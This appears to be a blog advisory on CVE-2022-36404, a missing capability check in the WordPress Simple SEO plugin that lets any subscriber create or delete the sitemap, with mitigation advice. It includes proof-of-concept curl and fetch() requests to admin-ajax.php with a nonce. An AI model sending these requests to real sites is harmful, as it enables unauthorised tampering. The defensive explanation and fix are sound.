---
If you run a WordPress site and use the Simple SEO Plugin by David Cole (version 1.8.12 or lower), you need to be aware of CVE-2022-36404. This post will break down the vulnerability, show how it can be abused, provide example code, and point out what you need to do to stay secure.
What Is CVE-2022-36404?
CVE-2022-36404 is a security flaw in the Simple SEO plugin for WordPress (up to version 1.8.12). Due to broken access control, any logged-in user—even a low-privileged subscriber—can create or delete the site's SEO sitemap. Normally, only site admins should have that power.
Affected Versions: <= 1.8.12
- Plugin Link: https://wordpress.org/plugins/simple-seo/
How Does This Happen?
The plugin includes AJAX functions that let users generate or delete sitemaps. However, it doesn’t properly check the capability level of the user before allowing these actions. As a result, any logged-in user, even a mere subscriber, can send a request and with a simple trick mess with the sitemap.
Here’s an example (simplified) of what the vulnerable code looks like in simple-seo.php
// Inside the plugin code (vulnerable)
add_action('wp_ajax_simple_seo_create_sitemap', 'create_sitemap');
function create_sitemap() {
// MISSING: capability check!
// Any logged-in user can reach here
generate_sitemap_file();
wp_send_json_success('Sitemap created');
}
add_action('wp_ajax_simple_seo_delete_sitemap', 'delete_sitemap');
function delete_sitemap() {
// MISSING: capability check!
// Any logged-in user can delete the sitemap
delete_sitemap_file();
wp_send_json_success('Sitemap deleted');
}
What’s missing? The code SHOULD check if the current user is an admin, like this
if (!current_user_can('manage_options')) {
wp_send_json_error('Not allowed');
return;
}
But in the vulnerable versions, it doesn’t! That means any user with an account can affect your SEO.
1. Steal Their Own Nonce
Log in as subscriber, then view the site’s pages or posts. If the plugin enqueues nonces for AJAX (often global JS vars), you might find something like:
var simple_seo_ajax_nonce = "abcdefgh12345678";
Or just guess/find the nonce if it’s easy to get.
Now just POST to the AJAX handler, e.g., using browser dev tools or curl
curl -X POST -H "Cookie: wordpress_logged_in_xxx" \
-d "action=simple_seo_delete_sitemap&security=abcdefgh12345678" \
https://targetsite.com/wp-admin/admin-ajax.php
Or use browser JavaScript console
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
credentials: 'include',
headers: {'Content-Type': 'application/x-www-form-urlencoded'},
body: 'action=simple_seo_create_sitemap&security=abcdefgh12345678'
}).then(res => res.text()).then(console.log)
3. Result: Sitemap is Created or Deleted
Without proper logging or notifications, site admins might not notice. Removing the sitemap can harm SEO and creating a new one could be used for further attacks.
Cause confusion or disrupt SEO tools
- Possibly abuse this as a first step for deeper attacks (e.g. storing code in sitemap files if there’s a further vulnerability)
How To Fix or Prevent
The Simple SEO plugin patched this issue in version 1.8.13. Update as soon as possible!
Manual Mitigation:
If you can’t update right now, edit the plugin’s sitemap functions to add a capability check
if (!current_user_can('manage_options')) {
wp_send_json_error();
exit;
}
References
- Official CVE Record – CVE-2022-36404
- WPScan Advisory
- Simple SEO Plugin Page
- Plugin Changelog
Final Thoughts
Broken access control is a common and dangerous bug in WordPress plugins. CVE-2022-36404 shows that even the simplest plugin functions should *always* check user capabilities.
If you use the Simple SEO plugin, update now and check that all your other plugins enforce strict permission checks for sensitive actions!
*Stay safe and keep your WordPress plugins up to date!*
Timeline
Published on: 11/03/2022 20:15:00 UTC
Last modified on: 11/04/2022 14:10:00 UTC